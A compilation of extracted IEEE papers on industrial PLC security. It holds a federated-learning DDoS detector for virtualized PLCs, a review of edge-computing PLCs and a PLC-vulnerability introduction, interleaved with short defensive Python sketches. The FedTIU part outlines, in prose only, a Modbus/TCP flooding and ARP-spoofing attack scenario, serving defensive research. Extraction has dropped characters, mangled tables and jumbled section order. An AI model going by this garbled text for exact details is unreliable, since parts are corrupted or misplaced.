PLCs. Therefore, new defense mechanisms and security solutions speci cally designed for vPLCs are needed to address the unique security challenges posed by virtualization. III. 
A TTACK SCENARIO ICS domain faces various attack vectors, but vPLCs are particularly vulnerable due to their integration with cloud com- puting. Attacks on vPLCs fall into three primary categories: attacks that target availability, con dentiality, and integrity. The present work focuses on the scenario depicted in Figure 1 where an attacker, located outside the industrial facility, exploits a vulnerability of the system (existing within the industry periphery) from the public network to gain access to the industrial system. The attacker can gain access through any public website opened by a worker within the industrial site. Once access is gained, the attacker performs a DDoS attack by sending Modbus/TCP packets to the vPLC at a higher rate in comparison to that it was designed to handle. This slows down the supporting supervisory functions of the vPLC, 234 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:27 UTC from IEEE Xplore. Restrictions apply. Fig. 1. Attack scenario considered including sharing alarms, collecting management records, and re-con guring the I/O hardware element connected to the vPLC. The attacker executes an ARP spoo ng attack after getting the internal system access by transmitting fraudulent ARP messages that link the attacker s MAC to the IP addresses of both the vPLC and Human Machine Interface (HMI). This enables the attacker to intercept and manipulate network traf c or stop all communication, causing a DoS attack. By executing a DoS attack, the attacker aims to place the system in an unsafe state, hindering the administrative user s ability to supervise or regulate the industrial system. This type of attack is in uenced by the approach outlined in [6]. IV . FL ENABLED THREA T INTELLIGENCE UNIT This section presents federated learning enabled Threat Intelligence Unit to detect the DDoS attack request against vPLC hosted on the edge compute stack in the manufacturing industry. The system model architecture considered is shown in Figure 2 and consists of different sites of manufacturing industries. Instead of hardware PLC, each industry is using a vPLC hosted at ECS. The vPLC processes the request made by the components of an industrial site. However, DDoS attacks can affect the availability of vPLC for serving the benign request as mentioned in section III. The proposed FedTIU sits along the vPLC at ECS and con- sists of three major components; Threat Analysis Unit (TAU), the Screening and ltering Unit (SFU), and the aggregator associated with the ARIA cloud. In more detail, the SFU contains a Traf c Policy Database (TPD) and Filtering Sub- Unit (FISU). TAU includes an Espy Sub-Unit (ESU), Local Training Sub-Unit (LTSU), and the Database (DB) to train the local model. LTSU is responsible for training the local model on the local dataset collected through the ESU. Figure 3 presents the architecture details of the proposed FedTIU. For all the incoming traf c, it will be forwarded to SFU (1). In SFU the TPD forwards it to FISU (2) orsends it to TAU for analysis purposes (3) when no policy is available. ESU classi es the traf c using edge data analysis, responding to the query (4). Meanwhile, ESU noti es LTSU of the suspicious ow (5) and stores the traces in DB. LTSU uses the informed ow to retrain the global model and sends training results to ESU (6). LTSU then distributes policies to TPD (7) and FISU (8). Finally, FISU rejects (9) or sends (10) the ow to access vPLC. A. 
Threat Analysis Unit The Threat Analysis Unit is responsible for training the local model and predicting new threats. The TAU coordinates with the SFU to respond to new threats and provide policies for them to the TPD and the FISU for future detection. The TAU consists of two major components; (i) an ESU and associated Database which is responsible for classifying the request as per edge data analysis and responding to TDP for the requested query, but does not update the policy. (ii) The LTSU, another TAU unit responsible for performing the local training on the local data. Here we used the hybrid CNN+GRU+MLP based DL model for training the local model. Whenever ESU detects a new treat, it noti es it to the LTSU then the LTSU retrains the model and shares it to the aggregator for global model aggregation. The training results are then sent to TPD and FISU to update and store the policies for the future. B. Screening and Filtering Unit SFU is responsible for monitoring and ltering incoming requests as per the de ned policies. SFU consists of two major components; (i) TPD which is used to store the policies, whenever a request arrives for vPLC it will be rst checked with TPD. If policies exist for such requests they will be forwarded to FISU for ltering. (ii) FISU, lters the traf c as per the traf c policy, i.e. forwards it to vPLC or rejects the ow. C. Aggregator The aggregation process is a crucial step in federated learning, where the model gradients from different LTSUs are combined to update the global model. In our proposed approach, a scheduler selects participants, send the global model to them, participants retrain the model, and send the updated models back for aggregation to update the global model. V. C ONCLUSION There are a number of attack vectors against industrial control systems, but for vPLCs they will now inherit attacks with a heritage in the Internet world, with the adoption of the cloud computing paradigm. Additionally, the communication protocols employed by vPLC lack built-in security measures and do not usually mandate any authentication for executing commands remotely on control devices. Thus the vPLC envi- ronment is open to cyber-physical attacks. In this study, our focus is on the DDoS attack which can affect the availability of vPLC services for its intended users. 235 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:27 UTC from IEEE Xplore. Restrictions apply. Fig. 2. System model architecture Fig. 3. Architecture of proposed FedTIU approach Therefore, this work proposed a Federated learning enabled Threat Intelligence Unit to detect DDoS attacks against vPLCs hosted on the ECS in the manufacturing industry. The pro- posed approach consists of three major components: Threat Analysis Unit, Screening and Filtering Unit, and Aggregator. The system model architecture is designed to enable other industrial sites to get their local DL model to learn about the attack in case if it happens on one site, improving the over- all security of the industrial ecosystem. Moreover, proposed model also leverages collaborative learning using FL along with ensuring the data privacy of the individual industrial sites. However, we are working on to simulate the similar envi- ronment to test the proposed approach and include the results in our future research. ACKNOWLEDGMENT The project is funded by Science Foundation of Ireland (SFI) under the Grant 16/RC/3918 and EU s MSCA withagreement Number 847577. 
This work has also received support from the VMware Academic Program. In order to promote open access, the author has chosen to apply a CC BY public copyright license to any version of the Author Accepted Manuscript that results from this submission. REFERENCES [1] M. Wollschlaeger, T. Sauter, and J. Jasperneite, The future of industrial communication: Automation networks in the era of the internet of things and industry 4.0, IEEE industrial electronics magazine , vol. 11, no. 1, pp. 17 27, 2017. [2] E. R. Alphonsus and M. O. Abdullah, A review on the applications of programmable logic controllers (plcs), Renewable and Sustainable Energy Reviews , vol. 60, pp. 1185 1205, 2016. [3] T. Cruz, P . Simoes, and E. Monteiro, Virtualizing programmable logic controllers: Toward a convergent approach, IEEE Embedded Systems Letters , vol. 8, no. 4, pp. 69 72, 2016. [4] P . V erma, J. G. Breslin, and D. O Shea, Fldid: Federated learning enabled deep intrusion detection in smart manufacturing industries, Sensors , vol. 22, no. 22, p. 8974, 2022. [5] P . V erma, S. Tapaswi, and W. W. Godfrey, A request aware module using cs-idr to reduce vm level collateral damages caused by ddos attack in cloud environment, Cluster Computing , pp. 1 17, 2021. [6] T. Alves, R. Das, A. Werth, and T. Morris, Virtualization of scada testbeds for cybersecurity research: A modular approach, Computers & Security , vol. 77, pp. 531 546, 2018. [7] Virtualized programmable logic controllers a paradigm shift toward industrial edge and cloud computing, an industrial internet consor- tium tech brief 20210907. https://www.iiconsortium.org/pdf/IIC-Edge- vPLC-Tech-Brief-20210907.pdf. Accessed: 2023-03-02. [8] O. Givehchi, J. Imtiaz, H. Trsek, and J. Jasperneite, Control-as-a- service from the cloud: A case study for using virtualized plcs, in 2014 10th IEEE W orkshop on Factory Communication Systems (WFCS 2014) , pp. 1 4, IEEE, 2014. [9] A. Willner and V . Gowtham, Toward a reference architecture model for industrial edge computing, IEEE Communications Standards Magazine , vol. 4, no. 4, pp. 42 48, 2020. [10] A. Teixeira, D. P erez, H. Sandberg, and K. H. Johansson, Attack models and scenarios for networked control systems, in Proceedings of the 1st international conference on High Con dence Networked Systems , pp. 55 64, 2012. [11] Y .-j. Xiao, W.-y. Xu, Z.-h. Jia, Z.-r. Ma, and D.-l. Qi, Nipad: a non-invasive power-based anomaly detection scheme for programmable logic controllers, Frontiers of Information T echnology & Electronic Engineering , vol. 18, pp. 519 534, 2017. 236 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:27 UTC from IEEE Xplore. Restrictions apply.
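Relating to the Screening and Filtering Unit described in Section IV of the FedTIU paper above, the following is a simplified sketch of a per-source request-rate screen that an SFU-like gateway could apply in front of a vPLC flooded with Modbus/TCP requests. The window length, threshold, and function names are illustrative assumptions; the paper does not specify its filtering policies at this level of detail.

```python
# Simplified per-source request-rate screen of the kind an SFU-like
# gateway could apply in front of a vPLC; window, threshold, and names
# are illustrative assumptions, not the FedTIU implementation.
import time
from collections import defaultdict, deque

WINDOW_S = 1.0                 # sliding-window length (assumed)
MAX_REQUESTS_PER_WINDOW = 50   # Modbus/TCP requests allowed per source (assumed)

_recent = defaultdict(deque)   # source IP -> timestamps of recent requests

def screen(source_ip, now=None):
    """Return 'forward' to pass the request to the vPLC, or 'drop'."""
    now = time.monotonic() if now is None else now
    q = _recent[source_ip]
    q.append(now)
    while q and now - q[0] > WINDOW_S:   # discard timestamps outside the window
        q.popleft()
    return "drop" if len(q) > MAX_REQUESTS_PER_WINDOW else "forward"

# A slowly polling HMI is forwarded; a flooding source is throttled.
print(screen("10.0.0.5", now=0.0))                             # forward
decisions = [screen("10.0.0.99", now=0.001 * i) for i in range(100)]
print(decisions[-1], decisions.count("drop"), "of 100 dropped")
```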
FedTIU: Securing Virtualized PLCs Against DDoS Attacks Using a Federated Learning Enabled Threat Intelligence Unit
Priyanka Verma1, Miguel Ponce De Leon2, John G. Breslin1, Donna O'Shea3
1Data Science Institute, University of Galway, Ireland, {firstname.lastname}@universityofgalway.ie
2VMware Research, VMware, Cork, Ireland, [email protected]
3Department of Computer Science, Munster Technological University, Cork, Ireland, [email protected]
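The Aggregator subsection of the FedTIU paper above describes combining model updates from the Local Training Sub-Units of several sites into a global model. The sketch below is a minimal federated-averaging (FedAvg-style) aggregation step over flat NumPy weight vectors; the paper's CNN+GRU+MLP model, participant scheduler, and transport are not reproduced, and the sample counts are invented for illustration.

```python
# Minimal federated-averaging (FedAvg-style) aggregation step; the model
# is reduced to flat NumPy weight vectors, and the sample counts are
# invented. The paper's CNN+GRU+MLP model and scheduler are not shown.
import numpy as np

def aggregate(site_updates, sample_counts):
    """Weighted average of per-site weight vectors (weights ~ local data size)."""
    coeffs = np.array(sample_counts, dtype=float) / sum(sample_counts)
    stacked = np.stack(site_updates)                 # (n_sites, n_params)
    return (coeffs[:, None] * stacked).sum(axis=0)   # new global weights

# One federated round with three industrial sites (synthetic numbers).
rng = np.random.default_rng(1)
global_weights = np.zeros(8)
local_updates = [global_weights + rng.normal(scale=0.1, size=8) for _ in range(3)]
local_samples = [1200, 800, 400]   # local training-set sizes (assumed)

global_weights = aggregate(local_updates, local_samples)
print(global_weights.round(3))     # broadcast back to every site's LTSU
```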
Potential_of_Edge_Computing_PLCs_in_Industrial_Automation.pdf
The ongoing industrial revolution, Industry 4.0, driven by a mesh of disruptive new technologies, promises a more effective and productive industrial environment. The challenges that have arisen as a side effect, such as the vast quantity of data that needs to be transmitted and processed safely in real time, require a new computing approach. One of the paradigms being used to tackle this problem is Edge computing, which, owing to increases in processing performance and storage capacity, moves data processing closer to the data origin. This approach is now being applied to Programmable Logic Controllers (PLCs), the core of industrial automation since the 1960s. This paper offers a side-by-side comparison of state-of-the-art PLCs that adopt Edge computing principles and of their fit in an already complex industrial network.
21st International Symposium INFOTEH-JAHORINA, 16-18 March 2022 978-1-6654-3778-3/22/$31.00 2022 IEEE In d u s tr y 4 .0S y s te m I n te g r a tio n A u g m e n te d r e a lityM a c h in e le a r n in g S im u la tio n s A d d itiv e M a n u fa c tu r in gB ig D a ta A u to n o m o u s R o b o ts C y b e r s e c u r ityC lo u d / E d g e c o m p u tin g Figure 1: Industry 4.0 - enabling technologies [5] Potential of Edge Computing PLCs in Industrial Automation Zorana Mandi Faculty of Electrical Engineering University of East Sarajevo East Sarajevo, Bosnia and Herzegovina [email protected] Stevan Stankovski, Gordana Ostoji Faculty of Technical Sciences University of Novi Sad Novi Sad, Serbia [email protected] , [email protected] Bo idar Popovi Faculty of Electrical Engineering University of East Sarajevo East Sarajevo, Bosnia and Herzegovina [email protected] Keywords- Edge computing, PLCs, Industry automation I. INTRODUCTION Industrial revolutions have changed the way of manufacturing and production of goods by utilizing disruptive new technologies. The first industrial revolution, starting in the late 18th century, introduced water and steam power that replaced human and animal labor [1]. One century later, the second revolution, characterized by new power sources (e.g. electric power) and the introduction of assembly lines, brought mass production to life. The third revolution began in the middle of the 20th century, with emphasized use of digital technologies. Industrial computers, designed to operate in the industrial environment, as well as advanced telecommunications, were incorporated into factories and all that led to the digital transformation of industry. During this revolution, the control of industrial processes shifted from robust relay logic systems to Programmable Logic Controllers (PLCs). With PLCs, a functional connection was established between digital/analog inputs [2] and outputs as well as the development of flexible control algorithms. The ongoing transformation of industry coined as the fourth industrial revolution or Industry 4.0 was introduced in 2011 to describe the vision of German industry driven by the Internet [3]. Industry 4.0 has the aim of increasing productivity, efficiency, safety, and transparency in the industry through a high level of integration between information and communication technologies and machines in cyber-physical systems (CPS) [4]. Different new revolutionizing technologies such as the Industrial Internet of Things - IIoT are enablers of ongoing transformation [5], as shown in Fig. 1. In the paradigm of IIoT, a significant number of connected types of machinery and objects are generating a vast quantity of data. Another characteristic of industrial applications is the necessity of real-time analyses and decision-making, which makes them latency-sensitive applications. Enormous quantity of data that needs to be transmitted and analyzed in a fast and secured environment may act as a challenge to a centralized cloud computing platform. To overcome the limitations of cloud computing and to satisfy the challenging conditions which arise in Industry 4.0, the computing power is being brought closer to the data sources through Edge computing architecture, making Edge computing a part of the Industry4.0 portfolio, as discussed in [6] and emphasized in [7]. Due to the increase in the performance of computers and processing as well as the enhancement of storage capacities, Edge computing brings new opportunities to data manipulation [8]. 
PLCs are positioned at the very edge of the industrial network, where their traditional role is evolving through the adoption of Edge computing principles [9]. This paper provides a review of edge PLCs, i.e., PLCs that implement Edge computing.
Edge analytic or a process of gathering and analyzing data on the edge of the network has a few major advantages [14]: reduced latency and storage costs, scalability, bandwidth reduction, increased cost-effectiveness and privacy and security preservation. Application domain of Edge computing is wide: from virtual reality [15], applications using 5G networks [16], transportation [17], to smart grids [18]. From 107 concrete user cases retrieved from comprehensive market analyses, available in [19] 10% belongs to the industry domain. Constraint of Edge computing on industrial automation will be discussed next. III. INDUSTRIAL AUTOMATION TRADITIONAL CONCEPT AND EDGE COMPUTING CONCEPT The International Society of Automation has developed the ISA-95 standard to describe the interface between control automation systems and enterprises. Pursuant to this standard, industrial automation systems follow 5-level reference architecture, as shown in Fig 3 [20]. Automation control, a symbiose of sensor/actuators and PLC/PACs, is placed on Levels 0 and 1. SCADA (Supervisory Control And Data Acquisition) used for monitoring is positioned on Level 2. Those levels require short response time and real-time analysis. MES (Manufacturing Execution Systems) on Level 3 and ERP (Enterprise Resource Planning) on Level 4 require information on a daily or weekly basis. A high volume of opportunities for research comes together Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply. Mass and Heterogeneous Connection Real -time Services Data Optimization Smart Applications Security and Privacy ProtectionC R O S SVALUES Figure 4: CROSS values of Edge computing [22] Physical world Cyber worldCLOUD TIER EDGE TIER FIELD TIERPLANT SCOPEENTERPRISE ECOSYSTEM SCOPE Real worldEdge nodes Things, People and EnviromentsConnected devices and Smart objectsEdge gateways Edge processingCloud servers Applications F igure 5: Reference architecture with three main tiers [24] with the rising population of Edge computing. Edge computing consortium, [21] has as assessed that Edge computing services deliver important CROSS values to industry digitalization (Fig 4): Connectivity of heterogeneous networks, which are populated with a mass quantity of devices, is the main pillar of Edge computing. The rising quantity of devices, as well as the interoperability of long existing industrial networks, label connectivity as one of the challenges of Edge computing. Industrial systems are latency-sensitive and require real-time analysis. Therefore, reducing latency and providing real-time services are some of the main contributions of Edge computing and one of the key research points, as elaborated in [22]. As a bridge between the physical and cyber world, edge serves as the first entry of a large amount of heterogeneous data which leads to the high importance of data optimization. Edge intelligence is making smart applications more efficient and provides major cost advantages. Security on the edge of a network includes device security, network security, and data and application security, where end-to-end protection is critical. With Edge computing entering the industry, there is an arising need to develop the reference architecture to accommodate edge principles in already existing industrial architecture. 
One of the reference architectures (RA) has been developed as a result of the H2020 FAR-EDGE [23] project by using the concepts of tiers and scopes to describe the structure of a system. Scopes define the mapping of system elements to a factory Plant scope or wider corporate IT enterprise ecosystem scope. Plant scope covers levels 0 to level 4, while ERP is part of the Enterprise ecosystem scope. Tiers can be tied to scopes but are technical-oriented classifications that divide a system into three main tiers as shown in Fig 5 with one support tier which provides services to other tiers. Bottom layer is the field tier layer, which consists of edge nodes and entities of the real world. Edge nodes, according to FAR-EDGE, are any devices that represent the bridge between the digital world on one side and the physical world on the other, with embedded intelligence (smart objects) or without it (connected devices). Second, and the core of RA, is the edge tier populated by edge gateways, computing devices more intelligent than edge nodes that host software executing edge processes, i.e. real-time analysis. The top layer of discussed RA is the cloud tier where cloud servers are deployed. The cloud servers host the business logic and have the widest scope of all the tiers. A cloud tier can be located on commercial clouds or on private clouds i.e., corporate data centers, to minimize privacy risks. Besides FAR-EDGE RA, Edge Computing Consortium and Industrial Internet Consortium proposed the RA which are described in [21]. IV. EDGE PLC S: STATE -OF-THE-ART In FAR-EDGE reference architecture, PLCs are positioned in field tier and labeled as edge nodes: smart objects. In the following section state-of-the-art PLCs will be presented, some of which are the outgrown position of edge nodes and can be labeled as edge gateways. A. ControlEdge PLC According to the Honeywell Process Systems manufacturer, ControlEdge PLC [25], is an advanced loop and logic controller characterized by modular design. Designed to comply with control and data management needs, this PLC is focused on connectivity. CPU modules, based on the e300 32- bit RISC PowerPC Architecture, handle the fast digital scanning and analog scanning through a dual scan method that supports a wide range of function block algorithms. Open Ethernet communication provides peer-to-peer communications between controllers as well as access by HMI or SCADA software applications. ControlEdge series offers redundant PLC with which the CPUs communicate, with up to 12 I/O modules over Ethernet or fiber optics. The operator interface provided by Honeywell, as well as third-party interfaces can be used for user interface support. B. GRV-EPIC-PR1 and GRV-EPIC-PR2 GRV-EPIC-PR1 and GRV-EPIC-PR2 are modular Edge computing PLCs that form the Groov EPIC (Edge Programmable Industrial Controller) [26] system. According to the manufacturer, it offers reliable real-time control that can be designed by using flowchart programming through PAC Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply. (by combining the PLC characteristics of a real-time machine with the strengths of personal-computer based systems creating Programmable Automation Controllers - PACs.) control, IEC 61131-3 compliant programs and, also, by using programming languages Python, C/C++ with access to the Linux OS. 
The collection, processing, exchange, and display of data at the very edge of the network are enabled via tools like Ignition Edge, Node-RED and MQTT. The integral touchscreen is used for on-premises data visualization, which can be done on an external HDMI monitor or web and mobile applications. C. MELIPC MI5000 Mitsubishi Electric Corporation brought out an Edge computing solution to industrial automation processes, composed of industrial computer MELIPC and software solutions. Leading hardware solution is incorporated in an industrial computer, the MELIPC MI5000 [27], create signed to implement real-time demands of industrial applications alongside an Edge computing application. The MI5000 is able to perform device control and data collection due to the VxWorks operating system, which stands as pre-installed software. Besides the VxWorks operating system, MI5000 can run Windows at the same time, which enables analysis display of acquired data and powerful processing at the edge. Industrial computer is equipped with CC-Link IE Field Network port and CC-Link IE Field Network Basic port, making compatible products easy to connect. Installing of additional software allows easy collection of data from third- party companies. Table 1 presents the parallel comparison of mentioned PLCs based on main characteristics. TABLE I. COMPARISON OF EDGE PLCS ControlEdge HC900 Controller groov EPIC GRV-IAC-24 MELIPC MI 5000 Power supply 90 264 V AC 47 63 Hz 110 240 V AC 50 60 Hz 100 240 V AC 47 63 Hz Operating ambient temp. 0 60 C -20 70 C 0 55 C Vibration resistance 0 Hz to 14 Hz amplitude 2.5 mm (peak-to- peak), 14 Hz to 250 Hz acc. 1 g N/D Compliant with JIS B 3502 and IEC 61131-2 Mounting DIN rail DIN rail DIN rail Pollution degree = 2 N/D <= 2 Ability to add I/O modules YES YES YES CPU N/D Quad-core ARM Intel Core i7- 5700EQ 2.6 GHz Operating system N/D Linux Windows 10 IoT Enterprise 2016 (64bit) VxWorks 7.0 Memory capacity 64 MB or 128 MB (depending on CPU model) 2 GB RAM 2MB battery- backed RAM + 6 GB user space 12 GB1 + 45 GB2 (45 GB1) 1 GB1 + 4 GB2 Programming language IEC-61131-3 standard languages Flowchart with PAC Control or IEC-61131-3 standard languages Python, C/C++ Language supporting Windows OS + C/C++ 1. Windows 10 IoT Enterprise 2016 (64bit) 2. VxWorks 7.0 As one of the main values of Edge computing, previously mentioned, connectivity will be discussed, separately, and displayed in Table 2. TABLE II. CONNECTIVITY CAPABILITIES OF EDGE PLC S ControlEdge HC900 Controller groov EPIC GRV-IAC-24 MELIPC MI 5000 RS-232 0 4 selectable ports 1 RS-485 2 - USB ports 0 2 (2.0) 2 (3.0) + 2 (2.0) Additional ports HDMI Display port CC-Link IE Field Network1 Ethernet Network Connection 10Base- T/100BASE- TX/1000BASE- T 10Base- T/100BASE- TX/1000BASE- T 10Base- T/100BASE- TX/1000BASE-T RJ-45 connectors 1 or 2 (dependent on CPU model) 2 1 + 1 1. High-speed data collection from compatible devices Taking the FAR edge architecture as a reference, and the characteristics of these three PLCs, it is possible to attach one of the tiers and classify them accordingly. ControlEdge represents modest edge PLC capabilities, the main strength of which is the connectivity and its functionalities match edge nodes' functionalities. Groov EPIC controller act as a modular PLC equipped with a built-in display, which offers real-time applications but also acts as an edge gateway, locating it in the edge tier. 
The MELIPC MI5000 is an industrial computer performing Edge computing applications in real-time which can be, easily, connected to a PLC to perform control applications. This industrial computer acts as an edge gateway, located in the edge tier. These PLCs enable implementation applications based on architectures and services for vast data analytics like: Software as a service (SaaS), Platform as a service (PaaS), Infrastructure as a service (IaaS), Predictive maintenance, Protocols for IoT/IIoT data collection. All advantages of these PLCs can be utilized only if you have engineers with appropriate knowledge [28],[29]. New edge PLCs are ready to bring additional value for customers over standard PLCs which are used only for control tasks. V. CONCLUSION The vast data quantity, generated from heterogeneous devices in the industrial environment, that requires real-time decision making represents a motivation for implementing a new paradigm, Edge computing, to industrial automation. This paradigm is being applied to PLCs and industrial computers, devices at the very edge of the network, from which three are presented in this paper. Edge PLCs, which are equipped with powerful capabilities, are bringing new computing power to the shop floor while maintaining real-time analysis. The devices act as a bridge between physical on-premise tier, populated with sensors and actuators, and higher tiers which Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply. consists of supervisory and business-oriented applications. With new computing capabilities, functionalities that are being performed on edge PLCs are improved. Applications from higher levels of industrial networks can be delegated to PLC making the industrial network more reliable in case of communication failure. REFERENCES [1] https://www.ibm.com/topics/industry-4-0 , Accessed: 30.12.2021. [2] S. Stankovski, G. Ostoji , M. Ni in, I. Baranovski, and L. Tarjan, Edge Computing for Fault Detection in Smart Systems , ICIST 2020 Proceedings, vol. 1, pp. 22-26. [3] https://www.bmbf.de/bmbf/de/forschung/digitale-wirts chaft-und- gesellschaft/industrie-4-0/industrie-4-0 , Accessed: 30.12.2021. [4] V. Alc cer and V. Cruz-Machado, Scanning the Industry 4.0: A Literature Review on Technologies for Manufacturing Systems , Engineering Science and Technology , vol. 22, no. 3, pp. 899-919, 2019 [5] C. Bai, P. Dallasega, G. Orzes and J. Sarkis, Industry 4.0 technologies assessment: A sustainability perspective , International Journal of Production Economics, vol. 229, 2020 [6] H. Boyes, B. Hallaq, J. Cunningham and T. Watson, The industrial internet of things (IIoT): An analysis framework , Computers in Industry , vol. 101, pp. 1-12, 2018 [7] Gesch ftsmodell-Innovation durch Industrie 4.0: Chancen und Risiken f r den Maschinen- und Anlagenbau , Munich and Stuttgart, 2015 [8] P. Garcia et. all, Edge-centric computing: vision and challenges ACM SIGCOMM Computer Community , vol. 45, no. 5, pp. 37 42, 2015 [9] S. Stankovski, G. Ostoji , M. aponji , M. Stanojevi and M. Babi , Using micro/mini PLC/PAC in the Edge Computing Architecture , 19th International Symposium Infoteh-Jahorina, March 2020. [10] S. Stankovski, G. Ostoji , I. Baranovski, M. Babi and M. Stanojevi , The impact of edge computing on industrial automation , 19th International Symposium Infoteh-Jahorina, March 2020. [11] W. Dai, H. Nishi, V. Vyatkin, V. Huang, Y. Shi and X. 
Guan, Industrial Edge Computing: Enabling Embedded Intelligence , IEEE Industrial Electronics Magazine, vol. 13, no. 4, pp. 48 56. [12] Z. K. Wazir, E. Ahmed, S. Hakak, I. Yaqoob and A. Ahmed, "Edge computing: A survey", Future Generation Computer Systems, vol. 97, pp. 219-235, 2019. [13] Y. Wu, H. -N. Dai and H. Wang, "Convergence of Blockchain and Edge Computing for Secure and Scalable IIoT Critical Infrastructures in Industry 4.0," IEEE Internet of Things Journal , vol. 8, no. 4, pp. 2300- 2317, 15 Feb.15, 2021. [14] K. A. Kumari EDGE COMPUTING Fundamentals, Advances and Applications , CRC Press, December 2021. [15] M. Chen, Y. Miao, H. Gharavi, L. Hu and I. Humar, Intelligent Traffic Adaptive Resource Allocation for Edge Computing-Based 5G Networks , IEEE Transactions on Cognitive Communications and Networking , vol. 6, no. 2, pp. 499-508, June 2020. [16] N. Hassan, K. A. Yau and C. Wu, "Edge Computing in 5G: A Review," IEEE Access, vol. 7, pp. 127276-127289, 2019. [17] S. Raza, S. Wang, M. Ahmed, M. R. Anwar, "A Survey on Vehicular Edge Computing: Architecture, Applications, Technical Issues, and Future Directions", Wireless Communications and Mobile Computing , vol. 2019, 19 pages, 2019. [18] Ch. Feng, Y. Wang, Q. Chen, Y. Ding, G. Strbac and C. Kang, "Smart grid encounters edge computing: opportunities and applications", Advances in Applied Energy , vol. 1, 2021. [19] McKinsey&Company, New demand, new markets: What edge computing means for hardware companies , High Tech Practise , October 2018. [20] B. Scholten, The Road to Integration: A Guide to Applying the ISA-95 Standard in Manufacturing , ISA, 2007 [21] Edge Computing Consotrium, Edge Computing Reference Architecture 2.0 , November 2017. [22] S. Trinks and C. Felden, Edge Computing architecture to support Real Time Analytic applications : A State-of-the-art within the application area of Smart Factory and Industry 4.0 , IEEE International Conference on Big Data , 2018. [23] FAR-EDGE Architecture and Components Specification, available on: https://ec.europa.eu/research/participants/documents /downloadPublic?do cumentIds=080166e5b3996c23&appId=PPGMS . Accessed: 30.12.2021. [24] I. Sitt n-Candanedo, R.S. Alonso, S. Rodr guez-Gonz lez, J.A. Garc a Coria, and F. De La Prieta, Edge Computing Architectures in Industry 4.0: A General Survey and Comparison , International Workshop on Soft Computing Models in Industrial and Environmental Applications pp. 121-131, 2018. [25] Control Edge, avaliabe on: https://www.honeywellprocess.com/library/marketing/t ech-specs/51-52- 03-31.pdf . Accessed: 30.12.2021. [26] Groov EPIC, avaliable on: https://documents.opto22.com/2267_groov_EPIC_Users_G uide.pdf . Accessed: 30.12.2021. [27] MI5000 , avaliable on: https://dl.mitsubishielectric.com/dl/fa/document/cat alog/melipc/l08578e ng/l08578engd.pdf . Accessed: 30.12.2021. [28] S. Stankovski, G. Ostoji , X. Zhang, I. Ze evi and M. Stanojevi , "Challenges with Edge Computing in Mechatronics Education," 2021 20th International Symposium INFOTEH-JAHORINA (INFOTEH) , 2021, pp. 1-4, doi: 10.1109/INFOTEH51037.2021.9400664. [29] S. Sarang, G. Stojanovi , S. Stankovski, and V. Jeoti, An Overview of Statistical Prediction Models for Solar Energy Harvesting Wireless Sensor Networks , Journal of Mechatronics, Automation and Identification Technolog y, vol. 6, no. 4. pp. 1-5, 2021. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply.
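Section IV of the edge-PLC paper above mentions that the groov EPIC collects, processes, and exchanges data at the network edge via tools such as Node-RED and MQTT. The following is a hypothetical sketch of edge-side data publication with the paho-mqtt client; the broker address, topic naming, and payload fields are assumptions for illustration, not vendor sample code.

```python
# Hypothetical edge-side telemetry publication over MQTT; broker address,
# topic scheme, and payload fields are placeholders, not vendor sample code.
import json
import time
from paho.mqtt import publish   # pip install paho-mqtt

BROKER = "192.168.1.10"                  # assumed on-premise MQTT broker
TOPIC = "plant/line1/plc1/telemetry"     # assumed topic naming scheme

def publish_reading(temperature_c: float, motor_on: bool) -> None:
    payload = json.dumps({
        "ts": time.time(),
        "temperature_c": temperature_c,
        "motor_on": motor_on,
    })
    # QoS 1: at-least-once delivery toward the edge gateway / SCADA layer.
    publish.single(TOPIC, payload, qos=1, hostname=BROKER, port=1883)

if __name__ == "__main__":
    publish_reading(temperature_c=41.7, motor_on=True)
```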
PLC_security_and_critical_infrastructure_protection.pdf
Programmable Logic Controllers (PLCs) are the most important components embedded in Industrial Control Systems (ICSs). ICSs have achieved high standards of efficiency and performance, and as a result a large portion of industrial infrastructure has been automated for the comfort of human beings. The protection of such systems is therefore crucial. It is important to investigate the vulnerabilities of ICSs in order to counter the threats and attacks against critical infrastructure and to protect human lives and assets. The PLC is the basic building block of an ICS: if PLCs are exploited, the overall system is exposed to the threat. Many believed that PLCs were secure devices due to their isolation from the external networks of the system, but attacks such as Stuxnet have proven such assumptions wrong. In this paper we reveal the vulnerabilities of PLCs through a variety of attack vectors that could affect the related critical infrastructure, and we propose solutions for such weaknesses in PLC-based systems.
PLC Security and Critical Infrastructure Protection

G. P. H. Sandaruwan, P. S. Ranaweera, and Vladimir A. Oleshchuk
Dept. of Information and Communication Technology, University of Agder (UiA), N-4898 Grimstad, Norway

Keywords: PLC vulnerabilities, PLC security, critical infrastructure protection

I. INTRODUCTION

Industrial automation is one of the most popular terms discussed over the past decade. Automation is an important aspect of industrialization, and its goal is to minimize human involvement, both physical and mental. Most of the critical infrastructure in the world has been automated by means of electronic devices and systems; common examples are elevators, escalators and trains.

Industrial infrastructure is heavily dependent upon automated control systems. ICSs consist of Supervisory Control and Data Acquisition (SCADA) systems, Distributed Control Systems (DCSs) and Programmable Logic Controllers (PLCs). The main functions of such an ICS are to sense (collect data), monitor, manage and perform actions (decision making based on the gathered data). A large portion of an ICS consists of hardware devices, but the most important part is a computer-driven system that provides an interface to the humans monitoring the system. Remote or distributed devices such as PLCs operate under the commands of computers. These commands can be pre-programmed (automated) or manually overridden by people. A computer or a data system can easily be attacked by means of computer viruses; if a virus attacks a computer and affects its programs, the ICS becomes vulnerable. Even though a manual override option is available, the damage done might be unrecoverable by the time it is activated. Therefore, finding such vulnerabilities and implementing solutions is vital.

The rest of this paper is organized as follows. The background is explained in Sec. II, related work is given in Sec. III, and possible attack vectors on PLC-based systems are introduced in Sec. IV. Countermeasures for securing PLC-based systems are given in Sec. V before the paper is concluded in Sec. VI.

II. BACKGROUND

